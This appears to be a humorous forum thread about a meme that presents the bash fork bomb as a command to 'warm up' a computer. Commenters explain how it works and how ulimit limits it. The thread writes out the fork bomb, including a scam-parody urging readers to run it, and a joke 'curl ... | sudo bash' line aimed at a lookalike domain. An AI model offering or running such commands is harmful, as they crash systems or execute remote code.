You should
You should
You should
If you're cold, they're cold.
Run this command to warm up your computery friends.
don't do this it INSTALLS MUSTARD GAS !
curl http://mustard-screensaver.glthub.biz/secure | sudo bash
nix run nixpkgs#mustard-gas
This cat is just :3
:3
At some point the Linux kernel will be patched to detect and terminate forking attacks, and sadly all these memes will be dead.
I doubt it. It's the halting problem. There are perfectly legitimate uses for similar things that you can't detect if it'll halt or not prior to running it. Maybe they'd patch it to avoid this specific string, but you'd just have to make something that looks like it could do something but never halts.
That's why I run all my terminal commands through ChatGPT to verify they aren't some sort of fork bomb. My system is unusably slow, but it's AI protected, futuristic, and super practical.
They could always do what Android does and give you a prompt to force close an app that hangs for too long, or have a default subprocess limit and an optional whitelist of programs that can have as many subprocesses as they want.
Just set your ulimit to a reasonable number of processes per user and you'll be fine.
How did this one work again? It was something with piping in a backgrounded subshell, right?
It creates a new process that spins up 2 new instances of itself recursively.
If you actually want that cat it's Uni
Here is an alternative Piped link(s):
Piped is a privacy-respecting open-source alternative frontend to YouTube.
I'm open-source; check me out at GitHub.
here have an video him on invidious
https://iv.ggtyler.dev/watch?v=h7YkVa0nsxE
(trying to get a few platforms)
Heh, haven't seen the bash forkbomb in close to two decades... Thanks for the trip down memory lane! :)
You know how I know I've gotten better at using linux?
I saw the command and read it and figured out what it was although I've never been exposed to a fork bomb before in my life.
I was like okay, this is an empty function that calls itself and then pipes itself back into itself? What the hell is going on?
I will say that whoever invented this is definitely getting fucked by roko's basilisk, though. The minute they thought of this it was too late for them.
99.999% of that function's effectiveness is that unix shell, being the ancient dinosaur it is, not just allows :
as a function name but also uses the exact same declaration syntax for symbol and alphanumeric functions:
foo(){ foo | foo& }; foo
is way more obvious.
EDIT: Yeah I give up I'm not going to try to escape that &
That's not a cat but quite obviously a rabbit.
Does it work on fish shell?
What that garble of symbols does, is that it defines and calls a function named :
, which calls itself twice.
The syntax for defining a function is different in Fish, so no, this particular garble will not work:
But it is, of course, possible to write a (much more readable) version that will work in Fish.
Doesn’t work in nushell, function syntax is different.
Probably still possible, just written differently.
On a modern system it shouldn't be that affected if you configure it right
Sudo fuck my system. There. Got it.
You laugh but you can configure a hard limit on forks.
Probably the most elaborate Rick roll I've ever received.
touch cat
echo Oreo > cat
cat cat
Edit: for some reason mine's saying Hydrox... results may vary.
It was a death sentence back then, but now I bet those with a threadripper with huge RAM can tank it until it hit ulimit.
Eh .. fork you!
It’s interesting that colon is a valid function name. Replace it with something else and it’s much more clear to understand what is going on here.
I prefer spoon bombs, thanks.
Is this Elon Musk's cat?
Ah yes. Uni(x bomb)
Should I try this in a VM ?
only thing this command does is slowly killing your pc
I ty...
i wanna test what happens but im Scared to do it on a vm
enjoy:
ill just crash your pc after a while
https://en.m.wikipedia.org/wiki/Fork_bomb
For those who are curious but not dumb.
Whenever I get a free engraving on something, I send this in.
Oh, this is like when I was in high school and made batch files that open themselves infinitely and named them "not a virus" on the desktop, only to enjoy other students immediately running them.
Mine had the text "you are won solitaire" on them
Good old Bobby Droptables
I like your style. How often have you been cursed at?
What for those of us who are dumb but not curious?
In that case...
Hello I am Nigerian Prince and you are last of my bloodline I have many millions of rubles to give you as successor but funds are locked, please type access code
:(){:|:&};:
into your terminal to unlock 45 million direct to your bank account wire transfer thank you.You just have to restart somehow.
No, it'll just lock it up but shouldn't cause any damage or data loss unless you have unsaved work open. A restart should fix it.
No. The effects of a fork bomb are temporary and are fixed with a restart